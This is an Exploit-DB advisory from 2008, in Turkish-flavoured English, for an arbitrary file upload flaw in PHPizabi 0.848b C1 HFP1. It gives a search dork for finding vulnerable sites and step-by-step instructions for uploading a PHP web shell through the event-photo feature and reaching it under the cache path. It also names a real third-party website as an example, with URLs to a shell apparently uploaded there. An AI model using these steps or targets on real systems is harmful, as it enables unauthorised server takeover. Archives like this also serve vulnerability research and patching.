PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload

EDB-ID:

5136


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-02-17


############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

-first register web site

-Create an event on the click and create an event ( direct create event url: http://localhost/izabi/?L=events.create )

-event title and description write. show to select All the users. gözat button click and shell.php upload

-after go to event page. upload photo right click. open the menu click to properties. copy the url

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and 

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasýrga(lavrens), avkidis, head_hunter 

and all users yildirimordulari.org

siircicocuk nerelerdesin be kanka msn e takýl özlettin kendini :)))

## yildirimordulari.org açýlýr mý açýlmaz mý orasý bilinmez ama bilinen birþey var o bir efsane ##

#################################################

# milw0rm.com [2008-02-17]